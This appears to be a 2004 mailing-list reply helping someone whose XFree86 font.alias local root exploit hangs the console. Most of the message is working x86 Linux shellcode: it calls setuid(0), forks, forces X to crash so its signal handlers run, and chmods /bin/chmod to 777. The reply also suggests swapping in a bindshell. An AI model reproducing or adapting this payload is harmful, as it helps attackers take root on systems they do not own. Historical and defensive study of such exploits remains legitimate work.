Re: XFree86 font.alias exploit hangup....

[lazy () server gwsh gda pl]

On Sun, Feb 22, 2004 at 10:51:18AM -0000, Dev wrote:
> My problem is that once i launch the exploit the X display appears momentarily & the keyboard locks up * so now i can 
> only access the box from the network & on a different shell.
> Offsets etc are all fine & an STRACE yields the following log which does indicate that the exploit was successful & 
> execve'd /bin//sh. But I am confised about the last few lines of the strace log.
> Plz tell me as to whether my root shell has exited because of some error in the last few calls? 
it looks like X closes STDIN or it's unavaiable because text console is disabled 
so you can't directly use execve. Text console
is broken because X i interupted during startup.

try this shellcode it chmods 777 /bin/chmod you can change code below dzic:
to start a bindshell or try to exec /bin/sh with a delay (to let sighendler do its job)
 maybe sighandler will make STDIN/STDOUT usefull again

The trick is to force SIGSEGV on X to call its cleanup handlers.
 
-----scode.s----
start:
//setuid(0)
xor %eax,%eax
xor %ebx,%ebx
mov $0x17,%al
int $0x80
//fork
xor %eax,%eax
movb $0x2,%al
int $0x80
test %eax,%eax
jz dzic
//the trick ;)
mov $0x44444444,%ebx
call %ebx

dzic:
//chmod(/bin/chmod,777)
xor %edx,%edx
xor %eax,%eax
mov $0xfff,%dx
push %edx
push $0x646f6d68
push $0x632f2f6e
push $0x69622f2f
mov %esp,%ebx
mov $0xf,%al
int $0x80
//exit
mov $0x1,%al
int $0x80
-------


--
Lazy